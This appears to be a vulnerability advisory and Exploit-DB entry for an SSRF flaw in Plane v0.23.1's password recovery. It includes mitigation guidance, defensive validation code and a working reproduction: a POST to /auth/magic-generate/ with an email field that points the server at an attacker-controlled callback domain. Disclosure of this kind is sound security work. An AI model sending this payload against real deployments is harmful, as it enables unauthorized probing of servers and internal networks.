Vendor: Plane
By: Saud Alenazi
CVSS: 7.1 (HIGH)
CWE: 918 (Server Side Request Forgery (SSRF))
Product Name: Plane
Affected Version From: v0.23.1
Affected Version To: v0.23.1
Patch Exists: NO
Related CWE: CVE-2024-XXXX (To be assigned)
CPE: a:makeplane:plane:0.23.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 x64
Year: 2024

Plane – Server Side Request Forgery (SSRF)

A Server-Side Request Forgery (SSRF) vulnerability was found in the password recovery feature of the Plane application. The vulnerability allows an attacker to place a crafted value in the email input field so that the server sends HTTP requests to attacker-controlled domains.

Mitigation:

To mitigate this vulnerability, validate and sanitize the email input before the server acts on it, so that a user-supplied domain can never become the target of a server-side request. Additionally, restrict the server from making outbound requests to external domains, for example by allowing only the hosts the recovery flow genuinely needs.
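As an added illustration of the mitigation above (example code written for this page, not Plane's own code), assuming a Python recovery handler: the assumed vulnerable pattern derives the outbound host from the domain part of the submitted address, while the hardened version validates the address syntax and only ever contacts a configured, allow-listed host. The host names and configuration values are placeholders, not Plane settings.

```python
import re
from typing import Optional, Tuple

# Assumed configuration for this example (not Plane's real settings): the only
# host the recovery flow may ever contact, taken from config, never from input.
RECOVERY_DELIVERY_HOST = "smtp.example.internal"
ALLOWED_OUTBOUND_HOSTS = frozenset({RECOVERY_DELIVERY_HOST})

# Conservative address syntax: one '@', bounded label lengths, no whitespace,
# colons or slashes, so the domain part cannot carry a port, path or scheme.
_EMAIL_RE = re.compile(
    r"^(?P<local>[A-Za-z0-9._%+-]{1,64})@"
    r"(?P<domain>(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63})$"
)


def parse_email(email: str) -> Optional[Tuple[str, str]]:
    """Return (local, domain) if the address is syntactically acceptable, else None."""
    if not isinstance(email, str) or len(email) > 254:
        return None
    m = _EMAIL_RE.match(email)
    return None if m is None else (m.group("local"), m.group("domain").lower())


def unsafe_recovery_host(email: str) -> str:
    """Assumed vulnerable pattern, for illustration only: the host the server
    contacts is derived from the user-supplied domain part of the address."""
    return email.split("@", 1)[-1]


def outbound_host_allowed(host: str) -> bool:
    """Egress check applied to every outbound request the recovery flow makes."""
    return host.lower().rstrip(".") in ALLOWED_OUTBOUND_HOSTS


def recovery_delivery_host(email: str) -> str:
    """Hardened pattern: validate the address, then deliver only through the
    configured host. The user-controlled domain never becomes a request target."""
    if parse_email(email) is None:
        raise ValueError("rejected: malformed email address")
    if not outbound_host_allowed(RECOVERY_DELIVERY_HOST):
        raise RuntimeError("rejected: delivery host is not on the allow-list")
    return RECOVERY_DELIVERY_HOST
```

With the advisory's own sample address, `unsafe_recovery_host` hands the attacker-chosen domain to the server as a request target, whereas `recovery_delivery_host` accepts the address as syntactically valid yet still returns only the configured host.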

Exploit-DB raw data:

# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64

Description:

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.

Steps to Reproduce:

1- Go to the password recovery or login section where the email input is required.

2- Inject the following payload in the email field, replacing the domain with a server you control:

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

Send the request:

POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.